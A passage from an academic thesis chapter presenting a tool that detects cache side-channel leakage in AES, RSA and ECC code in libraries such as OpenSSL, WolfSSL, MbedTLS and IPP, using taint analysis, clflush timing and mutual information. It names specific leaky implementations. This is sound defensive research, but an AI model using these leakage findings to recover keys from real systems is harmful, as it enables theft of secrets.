access and privilege monitoring are completely blind to leakage attacks. For
instance, any application submitted to the app store is checked for access
violations to devices. However, any attack code exploiting hardware leakage
would only monitor legitimate memory access time variations.
•Hard to Prevent: It is difficult to design leakage proof code, especially if
good performance is also an objective. Leakages are quite subtle and may
not be detected after deployment for a long time. Even if the code is not
leaky on one platform, with gradual optimizations implemented at the mi-
croarchitectural level, new leakage channels may emerge with newer releases
of a platform.
•Difficult to Test: Verification of leakage resistant code is painfully slow and
typically requires inspection by experts well versed in cache attacks.
In this section, we introduce a tool that helps cryptographic code designers to
analyze and expose any leakages in cryptographic implementations. We demonstrate
the viability of the technique by analyzing cache leakages in a number of popular
cryptographic libraries with respect to three main cryptographic primitives we rely
on every day to securely communicate over the internet: AES, RSA and ECC. In
order to achieve this goal, we first find secret dependent instructions/data with
dynamic taint analysis, introduce cache evictions inside code routines, record cache
121
traces and then verify the existing dependence with respect to the secret. Our results
show that, despite the efforts of cryptography library designers in reaction to the
multitude of recently published LLC cache attacks several popular libraries are still
vulnerable. In particular in this section:
•We present a proactive tool to analyze leakage behavior of security critical
code. Unlike other approaches, our tool can be used to find real exploitable
leakage in the design of cryptographic implementations.
•The tool identifies secret dependent data, obtains cache traces obtained from
the code execution on the microarchitecture and uses the generic Mutual In-
formation Analysis (MIA) as a metric to determine the existence of cache
leakage.
•The detection technique is agnostic to the implementation, i.e. the testing
code can be run across all target platforms without having to redesign it, yet
pinpoints parts of code that cause found leakages.
•We perform the first big scale analysis of popular cryptographic libraries on
three of the most commonly used primitives: AES, RSA and ECC.
•We demonstrate that several cache leakages are still present in up-to-date
cryptographic libraries (i.e. 50% still leak information) and need to be fixed.
7.3.1 Preliminaries
The proposed tool employs techniques from modern cache attacks to monitor cache
activity and measures information leakage using Mutual Information. We take into
account only Flush and Reload and Prime and Probe , as Invalidate and Transfer
exploits the same data types ans Flush and Reload .
7.3.1.1 LLC Attacks
The Flush and Reload was presented in Section 4 as a LLC side channel attack. In
particular attack assumes the following;
•The attacker and the victim are executing processes in the same CPU but in
different cores.
•Attacker and victim share read-only memory pages.
The Flush and Reload attack can only succeed when attacking memory blocks
shared with the potential victim. These usually imply static code and global vari-
ables, but never dynamically allocated variables.
Prime and Probe Attack The Prime and Probe attack was introduced as an ap-
proach to overcome those situations in which the Flush and Reload was unsuccessful
Both attacks differ in the following way:
122
•Prime and Probe does not require any memory sharing between victim and
attacker.
•Prime and Probe can increase the attack vector to dynamically allocated vari-
ables.
•Prime and Probe implies some reverse engineering to know which sets in the
cache the attacker is using, while Flush and Reload does not.
•Prime and Probe is noisier than Flush and Reload . In particular, a noisy access
in the first one can be caused by a single unrelated access to the monitored
set, while in the second a minimum of wunrelated accesses are needed, being
wthe associativity of the cache.
Taking these two attacks into account, we explore the cryptographic libraries
looking for leakages exploitable by either attack. Thus, we examine both statically
and dynamically allocated memory in our analysis. Note that, although these at-
tacks have been mainly used to attack the shared LLC, these leakages also appear
and can be exploited at any level of the cache hierarchy. Thus, our analysis will
detect leakages that can be exploited by either of these attacks (or variations of
them) in the entire cache hierarchy.
7.3.1.2 Mutual Information Analysis
This section gives a brief overview on Mutual Information Analysis and its use to
derive correlation, which will later be used to detect leakages. Assume we are given
a discrete variable Xwith probability distribution PX. Then the entropy of PXis
defined as
H(X) =−∑
x∈XPr[X=x] log2(Pr[X=x]). (7.1)
H(X) expresses the entropy or uncertainty of a variable in bits. The entropy is
0 when the variable always takes the same value; Pr[ X=Xi] = 1 and Pr[ X=
Xk] = 0 ,∀k̸=i. The maximum entropy is achieved when the variable Xis
uniformly distributed. We are now ready to define a metric that captures how much
the entropy of Xis reduced given Y. Or in other words, how much information is
leaked onXbyY. This metric is called Mutual Information I(X,Y ) and is defined
as
I(X;Y) =H(X)−H(X|Y) =H(X) +H(Y)−H(X,Y )
WhereH(X) is the entropy of random variable XandH(X|Y) is the entropy of
the random variable Xgiven the knowledge of the random variable Y. In a way
I(X;Y) gives us how related variables XandYare. Note that if XandYare
independent, I(X;Y) = 0 since H(X|Y) =H(X). In contrast, if XandYare fully
dependent we obtain maximum MI, i.e., I(X;Y) =H(X), sinceH(X|Y) = 0 (Y
fully determines X).
123
MI has been used in prior work for side channel attacks and leakage quantifica-
tion. Gierlichs et al. [GBTP08] utilize MI as a side channel distinguisher to mount
differential side channel attacks. Standaert et al. [SMY09] utilized MI as a leak-
age quantifier to evaluate side channel attack security. Prouff et al. [PR09] further
expanded on the limitations and strengths of MI as a side channel attack metric.
Recently Zhang and Lee [ZL14] used MI to measure the security level of several
cache architectures which they modeled as finite state machines.
7.3.2 Methodology
Our approach involves the monitorization of the cache usage for all the memory
addresses considered susceptible of carrying information of the secret to hide. In
order to achieve this goal we utilize common known techniques from cache attacks,
like the usage of cache flushing or cycle counter instructions.
We illustrate our approach on a toy example shown in Figure 7.3. The Hello
code snippet simply returns different messages depending on whether the caller is
a female or a male. We assume that the designer of this simple code does not
want a potential attacker to know the gender of the caller. Assume that the code
designers would like to know whether they did a good job, i.e., whether the cache
traces do not reveal the gender of the user. Here, it is easy to observe that there is
agender dependent branch that could reveal whether the user is a male or female.
We callB1 andB2 the two possible outputs of the branch. To test the sanity of
1void Hello ( char∗gender ){
2 i f( gender==”Male” ) {
3 male=1;
4}
5 else i f ( gender==”Female” ) {
6 female =1;
7}
8}
Figure 7.3: Vulnerable code snippet example
the code, we insert forced evictions at the beginning of the code routine for those
memory references susceptible of leaking information about the gender, and time the
re-access after its execution, as shown in Figure 7.4. Then we re-execute the code
routine for several input values, retrieving the cache traces for all those potentially
leaky references.
The cache traces for this simple example are shown in Figure 7.5. The x-axis
shows the actual gender while the y-axis represents accesses either to the cache as
a 1 or to memory as 0. The branch outputs are represented with different colors.
Observe that the cache traces match perfectly the gender that the code designer
is trying to hide. Thus, this code snippet would be classified as vulnerable. This
124
1evict (B1, B2);
2 Hello(&gender ) ;
3time( access (B1, B2));
Figure 7.4: Code snippet wrapped in cache tracer
is becauseB1 andB2 were located in different cache lines. However, due to their
proximity, it could have happened that both fall in the same cache line, in which
case the code would be classified as non-leaky.
True genderM M M M F M F F M FCache Trace
00.20.40.60.811.2B1
B2
Figure 7.5: Results for cache traces obtained from invocations of Hello for varying
inputs. The x-axis shows the actual gender whereas the y-axis represents cache
hits/misses (1 indicates hit, 0 indicates miss). The cache trace has full correlation
withB1 andB2 traces
.
Although identifying leakages in the toy example did not seem overly challeng-
ing, as the code starts getting more and more complicated, it becomes increasingly
difficult and time consuming both to find secret dependent memory and to detect
the leakages using manual code inspection. Particularly difficult to detect are cases
in which the code does not seem to leak, but subtle architectural optimizations at
the hardware level make the leakage appear [IIES15]. In order to cope with this
issues we introduce a tool that automatically finds secret dependent memory thanks
to the properties of dynamic taint analysis and that automates the analysis of cache
leakages through the usage of statistical properties like Mutual Information for num-
ber of different inputs. We proceed to explain the metric and the methodology to
identify secret dependent memory locations and to uncover hidden cache leakages.
125
7.3.2.1 Our Approach: MI Based Leakage Detection
Informally we can summarize our technique as follows: We first identify, thanks
to dynamic taint analysis, potentially leaky pieces in the target code that may
compromise the secret. For instance, variables and branch instructions that can
reveal information to the attacker. Then we insert forced cache hierarchy evictions
on those secret related memory addresses prior to the execution of the targeted piece
of code, and accesses after it. These accesses determine a clear cache fingerprint of
the potentially leaky memory addresses. Finally, we correlate the observed cache
trace with the secret to be extracted by the attacker using Mutual Information. We
summarize the proposed approach in four steps:
1. Identify, through a dynamic taint analysis, suspect instructions and variables
that might reveal information related to a secret in the targeted code.
2. Insert forced cache hierarchy evictions just before the vulnerable targeted code,
and accesses after it, for all the variables/instructions susceptible of leaking
secret information.
3. Execute the targeted code under different secret values, and record the cache
traces for every possible vulnerable variable.
4. Correlate, with MI, the observed cache traces to the secret value to determine
leakage existence.
7.3.2.2 The Detection Algorithm
We formalize the detection process as shown in Algorithm 10. The input is the
fragment of code that we want to analyze. First, the first step involves a dynamic
taint analysis to retrieve the potential variables/instructions that are dependent on
the secret the code routine is hiding. For each of them we generate access traces
obtained through the execution of the code for a large number of secret values.
We then compute the mutual information between the secret value used and ac-
cess trace obtained through during an execution of the code. We characterize the
code as to leak information if the average mutual information is above a predefined
baselinethreshold . We should note that two critical steps require code inspection:
identification of the suspect variables/instructions and how the secret will be pro-
cessed during MIA. Splitting the key requires understanding of the cryptographic
algorithm. To improve detection rates we split the key in a way that mimics key is
processing in a particular library (more details in Section 7.3.3).
7.3.2.3 Secret Dependent Memory Detection Using Dynamic Taint Anal-
ysis
In this work, we use dynamic taint analysis to effectively identify suspect instructions
and variables. In the past decade, dynamic taint analysis has been widely explored
126
Algorithm 10 MI based leakage test
function DoesItLeak (C);
Input : CodeC
Output : True: the code leaks;
False: the code does not leak
L= ListSecretTaintedMemory( C);
for eachviinLdo
trace = [ ], M = [ ];
for eachkey=⟨k0,k1,...,k l⟩value do
evict (vi);
execute (C,key);
trace.append( time (vi));
M.append(MI(trace, ⟨k0,k1,...,k l⟩);
end
ifM.average>threshold then
return True;
end
end
return False;
in many research areas, including malware analysis, vulnerability detection, program
debugging and data leak protection [ZJS+11, MWX+15]. Dynamic taint analysis is
a powerful approach to track the propagation of sensitive program data such as user
inputs.
To detect key dependent memory for crypto libraries, our dynamic taint anal-
ysis retrieves two kinds of information. First, we collect all branch instructions
affected by the taint inputs. Second, we collect all memory object information that
is accessed with a taint value as index.
We illustrate our approach on a toy example shown in Figure 7.6. The encrypt
function takes user input and encryption keys, and returns outincluding encrypted
data. The encrypt function checks keyand decides which variable is used for en-
cryption and invokes compute function to compute output. In the encrypt function,
variable keyis marked as taint inputs. Then we execute the program using our taint
analysis engine. The engine can easily identify that Line 8, variable index (Line 13)
and variable A (Line 14) are our desired information. This does not mean that
all three memory addresses will leak information; in fact, the variable index will
not leak information as it is used in both cases. Our taint analysis outputs secret
dependent data that might not leak information, and thus has to be verified with
cache trace analysis.
We employ a symbolic execution engine KLEE [CDE08] as our taint analysis
engine. The target program is compiled into a LLVM intermediate representation,
and then executed by the taint analysis engine to collect suspect instructions and
127
1static int A [ ] ={0x1 , 0x2 , 0x3 , 0x4 };
2static int B = 0x5 ;
3
4void encrypt ( int∗in , int∗out , int∗k )
5{
6int index
7for(int i = 0 ; i <64; ++i ){
8 i f( k [ i ] >=32){
9 index = 0 ;
10 compute ( in , out , B) ;
11}
12 else{
13 index = k [ i ] % 4 ;
14 compute ( in , out , A[ index ] ) ;
15}
16}
17}
18
19void main ( )
20{
21 int key [ 6 4 ] ,∗in ,∗out ;
22 get input (&key , in , out ) ;
23 s e t t a i n t (&key , 64 , ”key” ) ;
24
25 encrypt ( in , out , key ) ;
26}
Figure 7.6: Taint analysis example
128
variables.
7.3.2.4 Collecting the Cache Traces
We collect the cache usage for those memory locations that our dyncamic taint
analysis outputs during different executions for varying secret inputs of the tar-
geted code. In order to mimic the attacker ability to insert evictions, and due to
its high resolution, we utilize the common cache flushing and timing approach typ-
ically utilized in LLC attacks. In short, we insert forced flushes (with the clflush
instruction) for those variables that have a dependency with the key before the
targeted code, and timed accesses after it. These timing measurements are later
converted to 0s and 1s, compared to a pre-defined memory access threshold, indi-
cating whether these memory addresses were retrieved from the cache or from the
memory. These cache traces are later correlated using MI statistical properties to
derive dependencies with the secret to hide.
7.3.2.5 Dealing With Noise
Although our methodology works best in an environment with minimal unintended
noise coming from co-resident processes, our measurements will still suffer from the
omni-present microarchitectural/ OS noise. In that sense, the threshold (see Al-
gorithm 10) for which an implementation will be considered to be leaky has to be
established taking into account these unintended noise sources. Aiming at correctly
categorizing the leakage, we perform a set of identical measurements to those carried
out for the cryptographic primitives to an always used variable under microarchitec-
tural noise. Note that the variable is always cached and thus it should not present
any leakage. Our goal is to see how minimum microarchitectural noise affects to the
measurements that will later be taken for the cryptographic primitives. The results
of 100 MI calculations under minimal microarchitectural/OS noise on datasets con-
taining 105cache access times can be observed in Figure 7.7. Our noise threshold
will follow the famous three-sigma rule of thumb [Puk94], although one can use any
statistical method that fits best to the approach taken. In our case, if the leakage
observed for the cryptographic primitives is above μnoise+ 3σ, then the implemen-
tation is considered to leak information. On the other hand, if the leakage tests fall
bellowμnoise+ 3σ, then cryptographic algorithm is classified as to not exhibit any
visible leakage. Finally we note the threshold we set via experimentation is rather
conservative. This stems from the fact that cache access timing measurements are
susceptible to have false negatives, while memory accesses timing measurements do
not show false negatives. Therefore, microarchitectural noise tends to affect timing
measurements by increasing the measured time , but rarely reducing it.
129
 0 5x10-5 0.0001 0.00015 0.0002
 0  10  20  30  40  50  60  70  80  90  100Mutual Information (bits)
TrialMI Always cached variableFigure 7.7: 100 MI measurements each composed of 105time accesses to a cached
variable. Our noise threshold is set to μnoise+ 3σ
7.3.2.6 Threat Model
The threat model under consideration for our leakage tests is a key factor to be
taken into account before implementing the analysis. We restrict our threat model
to a software adversary capable of exploiting set collisions in any cache in the cache
hierarchy and use it as a covert channel. Furthermore, we assume that the attacker
is a regular user without root privileges. This means that we do not evaluate the
possible leakages coming from L1 bank contentions or more powerful attackers such
as malicious code with root level privileges. Although we restrict our leakage model
to the most common attack scenario, our methodology can be expanded to cover
more restrictive threat models. For instance, for an adversary capable of finer grain
timing of crypto libraries, e.g. by timing AES rounds by manipulating the com-
pletely fair scheduler [SCNS16], then we would also have to adapt the detection
algorithm to profile the rounds of AES individually instead of the AES entire exe-
cution. In any case, although time consuming, a finer grain analysis over the code
space will improve the detection rate.
7.3.3 Evaluated Crypto Primitives
We restrict our evaluation to three of the most widely used crypto primitives: AES,
RSA and ECC. Note that this methodology can be extended to any cryptographic
software code. However, for brevity we only focus on these three primitives. Note
that each cryptographic primitive has its own leakage behavior. Different implemen-
tations of the same cryptographic primitive may also result in very different leakage
behavior. Our analysis excludes the quantization of the number of measurements
needed by an attacker to exploit the leakage. Indeed, we believe code designers
should aim at designing leakage free code without taking into account the attacker
exploitation effort. Our analysis was performed on both Intel Core i7-6700K Sky-
130
T-Table /
S-boxP0
K1
0
 T-Table /
S-boxS9
0
K10
0
C0 S1
0FIRST ROUND LAST ROUNDFigure 7.8: First and Last round of an AES encryption. In both cases, the entry to
the T-table/S-box is influenced by the key and the plaintext/ciphertext
lake and Intel Core i5-650 Nehalem processors. However, the leakage we found does
not seem to be architecture dependent, except those for which the cache line size
affected the leakage. Since the cache line size is 64 bytes in the three most widely
used processors, i.e., Intel, ARM and AMD, our analysis should detect the same
leakages in other processors.
7.3.3.1 AES
Across the cryptographic libraries evaluated, we found three different AES imple-
mentations. The AES-NI implementation will be excluded from the analysis, since
it is a pure hardware based implementation. We are left with two techniques to
implement AES:
•T-table implementation: In this case, the entire AES algorithm (SubBytes,
ShiftRows, MixColumns, AddRoundKey) implements only XOR and Table
lookup operations. This implementation involves a maximum of 40 accesses
to each table per encryption. In previous Sections (e.g. Section 4.4) we showed
that leakages come from the fact that some of the table entries might not be
used by the algorithm.
•S-box implementation: In this case, the algorithm implements all four
steps of the algorithm (SubBytes, ShiftRows, MixColumns, AddRoundKey)
for every byte processed [DR99]. Thus the implementation is slower (160 S-
131
box reads per encryption) and the leakage comes from an unbalanced usage of
the S-box during the encryption.
Some implementations also might use a combination of both approaches, e.g.,
T-tables in the first rounds and S-box in the last. We will evaluate each of these
implementations separately. Our goal is to observe whether all key dependent ac-
cesses (mostly table look ups) are in the cache or not after an AES encryption.
In particular, we calculate the MI with respect to the ciphertext values, which will
present different cache-memory probability distributions if the implementation leaks
information. This is similar to the method outlined in [GBTP08]. We choose this
methodology to simplify our measurement collection and avoid calculations of the
last round key internally. Note that these represent only the implementations we
encountered across the libraries we evaluated, but are not the only implementation
options of AES. For instance, AES routines may utilize S-box/ T-table free imple-
mentations, which compute the inverse in Galois field mode without pre-computed
tables.
Customizing for AES Leakage Detection: For AES, the algorithm presented
in Algorithm 10 is customized to include several encryptions in a MI cache trace
vector. However, the main concept remains the same:
•the plaintext is fixed;
•for different key byte values we record different cache traces of our potentially
leaky variables; and
•the traces and the key bytes are correlated
However, note that we can also fix the key and randomize the plaintext input byte,
since in the first round the T-table entry access is influenced by both the plaintext
and the key bytes (see Figure 7.8). Similarly, we can apply the same concept in the
last round and compute the MI of our cache traces with the last round key bytes or
with the ciphertext bytes, since again the last round T-table access is influenced by
both the ciphertext and last round key bytes (Figure 7.8). This might be convenient
in cases where the last round is handled differently than the first 9 rounds and leaks
more information than the first. In this work, we compute the MI test in both the
first and last rounds, and select the one that leaks more information.
We restrict our analysis to 105and 107encryptions. This restriction allows us
to test AES leakages in at most a few hours. Furthermore, most cache side channel
attacks performed against AES have succeeded with fewer number of traces than
those we require in our analysis, as it can be observed in Table 4.1 in Section 4.4.6.
Therefore, we expect a leakage to be already visible with 107traces. However, the
analysis could be expanded to further encryptions, resulting in a much higher and
time consuming analysis.
132
7.3.3.2 RSA
The second cryptographic primitive that we evaluate is RSA, the most widely used
public key algorithm. RSA can be implemented in several ways, including by using
the Chinese Remainder Theorem, with and without ciphertext blinding or exponent
blinding. The only implementation that would completely stop cache and other side
channel attacks from recovering meaningful information is exponent blinding, since
a different exponent is used for every decryption. However, we have not seen any
cryptographic library using exponent blinding. RSA leakages can come from any
key dependent execution or memory usage during the modular exponentiation.
Customizing for RSA Leakage Detection: Across all the libraries evaluated in
this work, we found that there are two main (and distinct) ways in which crypto
libraries implement modular exponentiation in practice:
•Bitwise modular exponentiation : The algorithm processes the key and
executes all the squaring and multiplication operations bit by bit. This means,
in our detection algorithm we can split the key into bits and then correlate
with MIA with traces collected over the entire RSA encryption. Details on the
square and multiply implementations can be found in [Paa15], while details
on montgomery ladder implementations were further studied in [JY03].
•Fixed window algorithm : The algorithm first precomputes the set of val-
uesb0,b1,. . .,b2w−1in a table, wbeing the value of the window. Then, the
algorithm processes the key in chunks of wbits. For each chunk of wbits,
wsquares are executed and a multiplication with the appropriate value of
the window in the precomputed table. Our detection algorithm therefore, is
customized to split the key into fixed windows which are then correlated via
MIA with access traces collected over the entire windowed RSA encryption.
Further details on this implementations can be found in [Koc94, Paa15].
•Sliding window algorithm : The algorithm usually starts a window with a
MSB one bit. Similar to fixed windowed exponentiation, the algorithm first
precomputes the set of values b2w−1,b2w−1−1,. . .,b2w−1in a table, wbeing
the width of the largest window. Then, the algorithm processes the key in
chunks ofwbits only when the 1 is found in the key bit string. Until then,
squares are computed for each of the zeros processed. Once the starting 1
of the window is found, wsquares are executed and a multiplication with
the appropriate value of the window in the precomputed table. Note that in
this case we assumed the condition that the window starts with a 1. Other
implementations establish that the window start and finish with a 1.Further
details on this implementations can be found in [Koc94, Paa15].
Our analysis consists of observing leakage at the decryption process for 100 different
2048 bit decryption keys. Note that, unlike AES, RSA leakages are visible with much
133
fewer encryptions since the algorithm leaks serially bit by bit. AES on the contrary
needs aggregated measurements to derive the table entries utilized.
7.3.3.3 ECC
The last cryptographic primitive we analyzed is Elliptic Curve Cryptography (ECC).
We utilize Elliptic Curve Diffie Hellman (ECDH) as opposed to Elliptic Curve Dig-
ital Signature Algorithm (ECDSA) because in the latter the secret operation is
performed on an ephemeral key, which limits our analysis capabilities. Note that
this does not imply that the leakage observed for ECDH will not be present in
ECDSA, since both algorithms use the same implementation techniques in all the
libraries analyzed. As before, we utilize 100 different 256-bit private keys.
Customizing for ECC Leakage Detection: The scalar point multiplication
implementations we found are very similar to those observed for modular exponen-
tiation:
•Double and Add with Montgomery ladder : The algorithm processes the
secret scalar bit by bit, executing a double and an add regardless of the bit
value being processed. In the detection algorithm, the key is split into bits and
then correlated with access traces obtained over a scalar point multiplication
computation using MIA. More on bit by bit scalar multiplications can be found
in [Riv11].
•Fixed window algorithm : In this case, the algorithm first precomputes the
set of values P,2P,... . .,(2w−1)Pin a table, being wthe window size. Then,
the algorithm processes the secret scalar in chunks of wbits. For each chunk,
wdoublings are executed and an addition with the appropriate value of the
window in the precomputed table. In the detection algorithm the key is split
into fixed sized windows and then correlated with access traces obtained over
a scalar point multiplication computation using MIA. More details windowed
algorithms can be found in [YS06].
•Sliding window algorithm : In this case, the algorithm will set a condition
for the window. For instance, a condition might be that the window has to
start with a 1. Assuming this condition we have that the algorithm again first
precomputes the set of values (2w−1)P,(2w−1+ 1)P,. . .,(2w−1)Pin a table,
wbeing the window size. Then, the algorithm processes the secret scalar in
chunks ofwbits only when a 1 is found in the key. Until then, doublings are
issued for each of the zeros processed. Once the starting 1 of the window is
found,wdoublings are executed plus an addition with the appropriate value
of the window in the precomputed table. In the detection algorithm similar to
the fixed window case the key is split into bits and then correlated with access
traces obtained over a scalar point multiplication computation using MIA.
134
Table 7.1: Cryptographic libraries evaluated
Cryptographic Library Version
OpenSSL 1.0.1-t
WolfSSL 3.9.0
Intel Integrated Performance Primitives (IPP) 9.0.3
Bouncy Castle 1.8.1
LibreSSL 2.4.2
Mozilla Network Security Services (NSS) 4.13.0
Libgcrypt (NSS) 1.7.3
MbedTLS 2.3.0
•wNAF : Aiming at reducing the number of non-zero elements in a key, this
algorithm works with both signed and unsigned digits, making sure there are
at leastw−1 zeroes between two non-zero digits, wbeing the window size. The
algorithm precomputes the set of values ( P,3P,. . .,(2w−1−1)Pand performs
a double operation for every digit, plus an addition or subtraction whenever
for the non-zero digits. In the detection algorithm the key is split into recoded
into wNAF windows, and then correlated with access traces obtained over a
scalar point multiplication computation using MIA. More details of this kind
of implementation are provided in [ML09].
7.3.4 Cryptographic Libraries Evaluated
Our evaluation is restricted to 8 popular up-to-date (at the time of the leakage
evaluation) cryptographic libraries, represented in Table 7.1. The analysis can be
extended to other cryptographic libraries with mild effort.
7.3.5 Results for AES
In this section we present the results obtained for AES implementations for differ-
ent libraries. For the sake of brevity, we do not include all the results analyzed,
but rather examples of every kind of implementation. The complete results are
summarized in Section 7.3.8.
7.3.5.1 T-table Based AES (WolfSSL, MbedTLS, NSS & Bouncy Castle)
WolfSSL, MbedTLS, NSS and Bouncy Castle utilize T-table based implementations
to perform AES encryptions. We only include examples for WolfSSL and NSS. Note
that the results obtained for the other libraries are similar to the ones obtained for
WolfSSL and NSS shown in Figure 7.9(a) and Figure 7.9(b), respectively. For both
cases, the T-tables were classified as key dependent accesses and leaked information.
135
 0 0.01 0.02 0.03 0.04 0.05
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Trial numberWolfSSL T-table 105 encryptions
WolfSSL T-table 107 encryptions
Noise threshold(a)
 0 0.01 0.02 0.03 0.04 0.05
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Trial numberMIA NSS AES 105 measurements
MIA NSS AES 107 measurements
Noise threshold (b)
Figure 7.9: AES MI leakage in a) WolfSSL and b) NSS. The leakage is observable
at 105encryptions in both cases.
 0 0.01 0.02 0.03 0.04 0.05
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Trial numberOpenSSL S-box 105 encryptions
OpenSSL S-box 107 encryptions
Noise threshold
(a)
 0 0.01 0.02 0.03 0.04 0.05
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Trial numberLibgcrypt 105 measurements
Libgcrypt 107 measurements
Noise threshold (b)
Figure 7.10: AES S-box implementation MI leakage in a) OpenSSL and b)
Libgcrypt. None of them leak information.
Observe that in both cases the leakage is already observable at 105encryptions, and
that WolfSSL seems to leak more information than NSS. This is because WolfSSL
uses a different T-table for the last round, while NSS re-uses the first 4 T-tables in
the last round. Consequently, the probabilities are more distinguishable in the case
of WolfSSL. In both cases the leakage is above our noise threshold thus leading to
key recovery attacks after a small number of encryptions.
7.3.5.2 S-Box Based AES (OpenSSL, LibreSSL and libgcrypt)
In this case we analyze those implementations that utilize a single 256 entry S-
Box in the AES encryption. As before, we only show the results obtained for two
of them, since the results obtained for the rest are very similar. In this case, the
results for OpenSSL and Libgcrypt are included in Figure 7.10(a) and Figure 7.10(b),
respectively. In both cases, the S-boxes accesses were flagged as key dependent,
but the leakage results were not higher than our noise threshold, and as such are
categorized as non-leaky implementations. In the case of OpenSSL, we observe that
136
 0 0.2 0.4 0.6 0.8 1 1.2 1.4
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key number  WolfSSL RSA ML Data
WolfSSL RSA ML instructions
Noise threshold(a)
Always
used data
R0
R0
R0
 R1
R1Cache line 1
Cache line 2
Cache line 1
Cache line 2NO LEAKAGE CASE
 LEAKAGE CASE (b)
Figure 7.11: Montgomery ladder RSA MI leakage for WolfSSL (a) Instruction leak-
age is shown in magenta, data leakage shown in blue. Register accesses leak for
some keys due to cache alignment issues. b) Explanation for the varying leakage.
When R0 is not stored at a cache line boundary, its cache line is always used and
we cannot find leakage.
the S-Box entries are prefetched to the cache prior to the encryption. Libgcrypt
utilizes the approach described in [Ham09], i.e., they use vector permute instructions
not only to speed up the AES encryption but further to protect against cache attacks.
7.3.6 Results for RSA
 0 0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberWolfSSL RSA instructions+table
WolfSSL RSA instructions
Noise threshold
(a)
 0 0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberMbedTLS RSA table
MbedTLS RSA instructions
Noise threshold (b)
Figure 7.12: Sliding window RSA leakage for a) WolfSSL and b) MbedTLS. Ma-
genta indicates instruction leakage, blue indicates instruction+data leakage. Wolf-
SSL leaks from both possible sources (instructions reveal zeroes between windows,
data accesses reveal window values) and MbedTLS only leaks from the precomputed
table accesses.
Similar to the measurements taken for AES, we proceed to test the robustness of
the RSA implementations observed across our evaluated libraries. The three main
approaches found were:
137
 0 0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberOpenSSL RSA data
OpenSSL RSA instructions
Noise threshold(a)
 0 0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberIPP RSA table
IPP RSA instructions
Noise threshold (b)
Figure 7.13: Leakage for fixed window RSA in a) OpenSSL and b) IPP. Magenta
indicates instruction leakage, blue indicates instruction+data leakage. OpenSSL
does not leak information (scatter and gather approaches correctly used), while IPP
leaks varying amount of leakage for different decryption keys (although scatter and
gather is used)
7.3.6.1 Montgomery Ladder RSA (WolfSSL)
WolfSSL is the only library that utilizes Montgomery ladder to perform modular
exponentiations. This implementation attempts to prevent the leakages coming
from simple square and multiply approaches. Our results show that, among others,
squaring or multiplying instructions and key storing registers are key dependent.
The results for these are shown in Figure 7.11, where instruction leakage is presented
in magenta and data leakage coming from the registers in blue. We observe 0 MI
for these (or any) instructions involved in the modular exponentiation process leak
information. However, in the case of the registers, we see that the MI is 0 for
most of the keys, except for some for which it increases to almost 1, the maximum
entropy. These measurements cannot be outliers, since even if a noisy measurement
is observed, it should not output an almost maximum MI. Thus, after inspecting
this particular behavior, we realized that the MI was high only when the variable
R0started at a cache line boundary. If it does not, then there is data allocated
in the same cache line that is used regardless of the key bit (fetching the R0cache
line always to the cache). This behavior is represented in Figure 7.11(b). Note that
the alignment of the register R0is controlled by the OS, and usually changes from
execution to execution. In consequence, a potential attacker only needs to keep
iterating until observing a trace for which R0is aligned with a cache line boundary.
Our methodology was able to find this particular cache alignment dependent leakage,
which would not be observable without empirical cache traces.
138
C0
0
C1
0
C2
0
C3
0
C0
1
C1
1
C2
1
C3
1
C0
2
C1
2
C2
2
C3
2
C0
3
C1
3
C2
3
C3
3
SET 0
SET 1
SET 2
SET 3PRECOMPUTED 
TABLE(a)
C0
0
C1
0
C2
0
C3
0
C0
1
C1
1
C2
1
C3
1
C0
2
C1
2
C2
2
C3
2
C0
3
C1
3
C2
3
SET 0
SET 1
SET 2
SET 3PRECOMPUTED 
TABLE (b)
Figure 7.14: Cache structure difference for aligned and misaligned precomputed
table when using scatter and gather approaches. Observe that when misaligned, an
attacker monitoring set 0 can retrieve when c3is being used.
7.3.6.2 Sliding Window (WolfSSL, MbedTLS, Libgcrypt & Bouncy Cas-
tle)
WolfSSL and MbedTLS utilize sliding window approaches, which require the win-
dow to start with a 1 bit. Sliding window approaches are quite common in RSA
cryptographic implementations. Indeed, they are faster because less multiplications
are used than when processing the key bit by bit. This comes at the cost of storing a
table of several precomputed powers of the ciphertext. For these implementations,
squaring and multiplications and the pre-computed table were flagged as key de-
pendent. Results for these are shown in Figure 7.12(a) and Figure 7.12(b), where
instruction leakage is shown in magenta and the instruction + data leakage is shown
in blue. We found instruction leakage in WolfSSL due to the usage of the multipli-
cation function (different from the square function), revealing the zeroes between
windows. Accesses to the precomputed table also leak information, revealing the
window values being used. In the case of MbedTLS we only found table entry ac-
cesses to be non-protected, which reveal the window values. In both cases (easier
in the case of WolfSSL), an attacker monitoring the cache would be able to retrieve
the key [IGI+16b, Fan15].
7.3.6.3 Fixed Window (OpenSSL and IPP)
OpenSSL and IPP utilize fixed window approaches to perform modular exponen-
tiations, wich execute a constant number of squares and multiplications for every
139
key value. In contrast to sliding window approaches, fixed window exponentiations
do not have requirements for processing windows. The results are presented in Fig-
ure 7.13(a) and 7.13(b). In OpenSSL, we observe that neither the key dependent
instructions nor the data leakage is above our noise threshold, i.e., our test cate-
gorizes it as non-leaky implementation. One of the reason, among others, is that
OpenSSL uses a scatter and gather approach [HGLS07], i.e., ciphertext powers are
stored vertically in the cache and not horizontally. Thus, each cache line contains
a little bit of information of each of the ciphertext powers (the multiplicants), as
seen in Figure 7.14(a). This technique ensures that all the ciphertext powers are
loaded whenever one is needed, and thus, an attacker is not able to distinguish
which (among all) was accessed. However, other covert channels might exploit this
approach [YGH16].
We found no instruction leakage in IPP. In contrast, varying data leakage coming
from the pre-computed table was observed for different keys. To better understand
this counter-intuitive behavior, we investigated the code. We realized that IPP uses
